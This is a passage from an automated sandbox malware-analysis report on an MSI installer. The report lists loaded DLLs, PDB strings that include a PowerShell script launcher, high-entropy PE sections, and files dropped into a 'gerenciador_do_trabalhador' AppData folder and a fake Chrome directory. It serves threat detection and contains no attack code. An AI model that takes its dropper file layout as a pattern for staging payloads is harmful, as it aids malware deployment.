                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: msvcp140_app.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: vcruntime140_1_app.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: vcruntime140_app.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: vcruntime140_app.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: vcruntime140_1_app.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: d3d9.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: version.dllJump to behavior
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: d3d9.dllJump to behavior
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: version.dllJump to behavior
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: magnification.dllJump to behavior
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1A66AEDC-93C3-4ACC-BA96-08F5716429F7}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: 2024.0198840 298135.msiStatic file information: File size 7456256 > 1048576
                  Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\vcomp140_app.amd64.pdb source: vcomp140_app.dll.1.dr
                  Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\initialexe\chrome.exe.pdb source: WebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000000.1878193789.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe.6.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: 2024.0198840 298135.msi, 53e56a.msi.1.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdbg source: 2024.0198840 298135.msi, 53e56a.msi.1.dr
                  Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\vccorlib140_app.amd64.pdb source: vccorlib140_app.dll.1.dr
                  Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_pwa_launcher.exe.pdb source: WebExperienceHostApp.exe, 00000006.00000003.1848678381.00007DF4D38A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\msvcp140_app.amd64.pdb source: WebExperienceHostApp.exe, 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmp, msvcp140_app.dll.1.dr
                  Source: Binary string: WebExperienceHostApp.pdb&& source: WebExperienceHostApp.exe, 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe, 00000006.00000000.1832671462.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe.1.dr
                  Source: Binary string: WebExperienceHostApp.pdb source: WebExperienceHostApp.exe, 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe, 00000006.00000000.1832671462.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe.1.dr
                  Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\vccorlib140_app.amd64.pdbGCTL source: vccorlib140_app.dll.1.dr
                  Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\vcruntime140_app.amd64.pdb source: WebExperienceHostApp.exe, 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmp, vcruntime140_app.dll.1.dr
                  Source: Binary string: mrt100_app.pdb source: mrt100_app.dll.1.dr
                  Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\vcomp140_app.amd64.pdbGCTL source: vcomp140_app.dll.1.dr
                  Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\vulkan-1.dll.pdb source: WebExperienceHostApp.exe, 00000006.00000003.1871655421.00007DF4D38C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: B.pdb source: external_extensions_0000x.57.6.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: 2024.0198840 298135.msi, MSIE7DF.tmp.1.dr, MSIE770.tmp.1.dr, MSIE6C2.tmp.1.dr, MSIE790.tmp.1.dr, MSIE740.tmp.1.dr, 53e56a.msi.1.dr
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FF60BD72AA0 LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,6_2_00007FF60BD72AA0
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .8i0
                  Source: mrt100_app.dll.1.drStatic PE information: section name: .didat
                  Source: vcruntime140_app.dll.1.drStatic PE information: section name: _RDATA
                  Source: vcruntime140_1_app.dll.1.drStatic PE information: section name: .didata
                  Source: chrome.exe.6.drStatic PE information: section name: .gxfg
                  Source: chrome.exe.6.drStatic PE information: section name: .retplne
                  Source: chrome.exe.6.drStatic PE information: section name: CPADinfo
                  Source: chrome.exe.6.drStatic PE information: section name: _RDATA
                  Source: chrome.exe.6.drStatic PE information: section name: malloc_h
                  Source: chrome_elf.dll.6.drStatic PE information: section name: .didata
                  Source: chrome_elf.dll.6.drStatic PE information: section name: .Qg}
                  Source: chrome_elf.dll.6.drStatic PE information: section name: .zJ\
                  Source: chrome_elf.dll.6.drStatic PE information: section name: .'i+
                  Source: chrome_elf.dll.6.drStatic PE information: section name: .8i0
                  Source: chrome_pwa_launcher.exe.6.drStatic PE information: section name: .00cfg
                  Source: chrome_pwa_launcher.exe.6.drStatic PE information: section name: .gxfg
                  Source: chrome_pwa_launcher.exe.6.drStatic PE information: section name: .retplne
                  Source: chrome_pwa_launcher.exe.6.drStatic PE information: section name: LZMADEC
                  Source: chrome_pwa_launcher.exe.6.drStatic PE information: section name: _RDATA
                  Source: chrome_pwa_launcher.exe.6.drStatic PE information: section name: malloc_h
                  Source: vulkan-1.dll.6.drStatic PE information: section name: .gxfg
                  Source: vulkan-1.dll.6.drStatic PE information: section name: .retplne
                  Source: vulkan-1.dll.6.drStatic PE information: section name: _RDATA
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002BD180 pushfq ; retf 0000h6_2_00007FFE002BD181
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002BF6C4 pushfq ; ret 6_2_00007FFE002BF6C5
                  Source: chrome_elf.dll.6.drStatic PE information: section name: .8i0 entropy: 7.347292836291067
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE790.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_pwa_launcher.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\vulkan-1.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\msvcp140_app.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\vcamp140_app.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\vcruntime140_1_app.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\mrt100_app.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\vccorlib140_app.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE7DF.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\vcruntime140_app.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE740.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE6C2.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIED31.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_elf.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\vcomp140_app.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE770.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_pwa_launcher.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\vulkan-1.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_elf.dllJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE790.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE7DF.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE740.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE6C2.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIED31.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE770.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
